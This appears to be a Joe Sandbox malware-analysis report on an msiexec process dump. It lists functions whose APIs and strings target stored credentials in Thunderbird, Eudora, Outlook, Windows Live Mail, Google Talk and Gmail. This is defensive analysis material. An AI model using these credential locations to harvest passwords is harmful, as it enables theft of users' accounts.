                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: strlen$memset$_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                    • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                    • API String ID: 3833278029-4223776976
                                                                    • Opcode ID: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                                    • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                    • Opcode Fuzzy Hash: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                                    • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                                                                    Function 0040CF44 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 169COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                      • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                      • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                      • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                    • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                    • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                    • API String ID: 745651260-375988210
                                                                    • Opcode ID: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                                    • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                    • Opcode Fuzzy Hash: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                                    • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                                                                    Function 00403C16 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                    • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                    • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                    • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                    Strings
                                                                    • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                    • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                    • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                    • PStoreCreateInstance, xrefs: 00403C44
                                                                    • pstorec.dll, xrefs: 00403C30
                                                                    • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                    • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                    • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                    • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                    • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                    • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                    • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                    • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                    • API String ID: 1197458902-317895162
                                                                    • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                    • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                    • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                    • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                                                                    Function 00444C4A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 128COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 231 444c4a-444c66 call 444e38 GetModuleHandleA 234 444c87-444c8a 231->234 235 444c68-444c73 231->235 237 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 234->237 235->234 236 444c75-444c7e 235->236 239 444c80-444c85 236->239 240 444c9f-444ca3 236->240 245 444d02-444d0d __setusermatherr 237->245 246 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 237->246 239->234 243 444c8c-444c93 239->243 240->234 241 444ca5-444ca7 240->241 244 444cad-444cb0 241->244 243->234 247 444c95-444c9d 243->247 244->237 245->246 250 444da4-444da7 246->250 251 444d6a-444d72 246->251 247->244 252 444d81-444d85 250->252 253 444da9-444dad 250->253 254 444d74-444d76 251->254 255 444d78-444d7b 251->255 257 444d87-444d89 252->257 258 444d8b-444d9c GetStartupInfoA 252->258 253->250 254->251 254->255 255->252 256 444d7d-444d7e 255->256 256->252 257->256 257->258 259 444d9e-444da2 258->259 260 444daf-444db1 258->260 261 444db2-444dc6 GetModuleHandleA call 40cf44 259->261 260->261 264 444dcf-444e0f _cexit call 444e71 261->264 265 444dc8-444dc9 exit 261->265 265->264
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                    • String ID: k:v
                                                                    • API String ID: 3662548030-4078055367
                                                                    • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                    • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                                    • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                    • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D
                                                                    Function 004442EA Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • memset.MSVCRT ref: 0044430B
                                                                      • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                      • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                      • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                      • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                      • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                    • memset.MSVCRT ref: 00444379
                                                                    • memset.MSVCRT ref: 00444394
                                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                    • strlen.MSVCRT ref: 004443DB
                                                                    • _strcmpi.MSVCRT ref: 00444401
                                                                    Strings
                                                                    • Store Root, xrefs: 004443A5
                                                                    • \Microsoft\Windows Mail, xrefs: 00444329
                                                                    • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                    • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$strlen$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                    • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                    • API String ID: 3203569119-2578778931
                                                                    • Opcode ID: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
                                                                    • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                    • Opcode Fuzzy Hash: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
                                                                    • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                                                                    Function 0040CCD7 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 290 40ccd7-40cd06 ??2@YAPAXI@Z 291 40cd08-40cd0d 290->291 292 40cd0f 290->292 293 40cd11-40cd24 ??2@YAPAXI@Z 291->293 292->293 294 40cd26-40cd2d call 404025 293->294 295 40cd2f 293->295 297 40cd31-40cd57 294->297 295->297 299 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 297->299 300 40cd59-40cd60 DeleteObject 297->300 300->299
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                    • String ID:
                                                                    • API String ID: 2054149589-0
                                                                    • Opcode ID: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                    • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                    • Opcode Fuzzy Hash: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                    • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                                                    Function 0040BA28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 307 40ba28-40ba3a 308 40ba87-40ba9b call 406c62 307->308 309 40ba3c-40ba52 call 407e20 _mbsicmp 307->309 331 40ba9d call 4107f1 308->331 332 40ba9d call 404734 308->332 333 40ba9d call 404785 308->333 334 40ba9d call 403c16 308->334 314 40ba54-40ba6d call 407e20 309->314 315 40ba7b-40ba85 309->315 320 40ba74 314->320 321 40ba6f-40ba72 314->321 315->308 315->309 316 40baa0-40bab3 call 407e30 324 40bab5-40bac1 316->324 325 40bafa-40bb09 SetCursor 316->325 323 40ba75-40ba76 call 40b5e5 320->323 321->323 323->315 327 40bac3-40bace 324->327 328 40bad8-40baf7 qsort 324->328 327->328 328->325 331->316 332->316 333->316 334->316
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Cursor_mbsicmpqsort
                                                                    • String ID: /nosort$/sort
                                                                    • API String ID: 882979914-1578091866
                                                                    • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                    • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                    • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                    • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                    Function 004109CF Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • memset.MSVCRT ref: 004109F7
                                                                      • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                      • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                    • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                    • memset.MSVCRT ref: 00410A32
                                                                    • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                    • String ID:
                                                                    • API String ID: 3143880245-0
                                                                    • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                    • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                    • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                    • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                    Function 0044B33B Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 358 44b33b-44b342 359 44b344-44b34a ??3@YAXPAX@Z 358->359 360 44b34b-44b352 358->360 359->360 361 44b354-44b35a ??3@YAXPAX@Z 360->361 362 44b35b-44b362 360->362 361->362 363 44b364-44b36a ??3@YAXPAX@Z 362->363 364 44b36b-44b372 362->364 363->364 365 44b374-44b37a ??3@YAXPAX@Z 364->365 366 44b37b 364->366 365->366
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID:
                                                                    • API String ID: 613200358-0
                                                                    • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                    • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                    • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                    • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                    Function 00410DBB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 367 410dbb-410dd2 call 410d0e 370 410dd4-410ddd call 4070ae 367->370 371 410dfd-410e1b memset 367->371 378 410ddf-410de2 370->378 379 410dee-410df1 370->379 372 410e27-410e35 371->372 373 410e1d-410e20 371->373 376 410e45-410e4f call 410a9c 372->376 373->372 375 410e22-410e25 373->375 375->372 380 410e37-410e40 375->380 386 410e51-410e76 call 410d3d call 410add 376->386 387 410e7f-410e92 _mbscpy 376->387 378->371 382 410de4-410de7 378->382 385 410df8 379->385 380->376 382->371 384 410de9-410dec 382->384 384->371 384->379 388 410e95-410e97 385->388 386->387 387->388
                                                                    APIs
                                                                      • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                      • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                    • memset.MSVCRT ref: 00410E10
                                                                    • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                      • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                    Strings
                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProcVersion_mbscpymemset
                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                    • API String ID: 119022999-2036018995
                                                                    • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                    • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                    • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                    • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                    Function 004085D2 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 79COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 393 4085d2-408605 call 44b090 call 4082cd call 410a9c 400 4086d8-4086dd 393->400 401 40860b-40863d memset call 410b62 393->401 404 4086c7-4086cc 401->404 405 408642-40865a call 410a9c 404->405 406 4086d2 404->406 409 4086b1-4086c2 call 410b62 405->409 410 40865c-4086ab memset call 410add call 40848b 405->410 406->400 409->404 410->409
                                                                    APIs
                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                      • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                      • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                      • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                      • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                      • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                      • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                    • memset.MSVCRT ref: 00408620
                                                                      • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                    • memset.MSVCRT ref: 00408671
                                                                    Strings
                                                                    • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$ByteCharMultiNameWidestrlen$ComputerEnumUser
                                                                    • String ID: Software\Google\Google Talk\Accounts
                                                                    • API String ID: 3996936265-1079885057
                                                                    • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                    • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                    • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                    • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                                    Function 0040CE70 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 441 40ce70-40cea1 call 4023b2 call 401e69 446 40cea3-40cea6 441->446 447 40ceb8 441->447 448 40ceb2 446->448 449 40cea8-40ceb0 446->449 450 40cebd-40cecc _strcmpi 447->450 453 40ceb4-40ceb6 448->453 449->453 451 40ced3-40cedc call 40cdda 450->451 452 40cece-40ced1 450->452 454 40cede-40cef7 call 40c3d0 call 40ba28 451->454 458 40cf3f-40cf43 451->458 452->454 453->450 462 40cef9-40cefd 454->462 463 40cf0e 454->463 464 40cf0a-40cf0c 462->464 465 40ceff-40cf08 462->465 466 40cf13-40cf30 call 40affa 463->466 464->466 465->466 468 40cf35-40cf3a call 40c580 466->468 468->458
                                                                    APIs
                                                                      • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                    • _strcmpi.MSVCRT ref: 0040CEC3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: strlen$_strcmpimemset
                                                                    • String ID: /stext
                                                                    • API String ID: 520177685-3817206916
                                                                    • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                    • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                    • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                    • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                    Function 00404734 Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                    • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadProc
                                                                    • String ID:
                                                                    • API String ID: 145871493-0
                                                                    • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                    • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                    • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                    • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                    Function 00410A6B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                      • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                      • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                      • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfile$StringWrite_itoamemset
                                                                    • String ID:
                                                                    • API String ID: 4165544737-0
                                                                    • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                    • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                    • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                    • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                    Function 00404785 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                    • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                    • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                    • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                    Function 00406D1A Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                    • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                    • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                    • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                    Function 004107F1 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
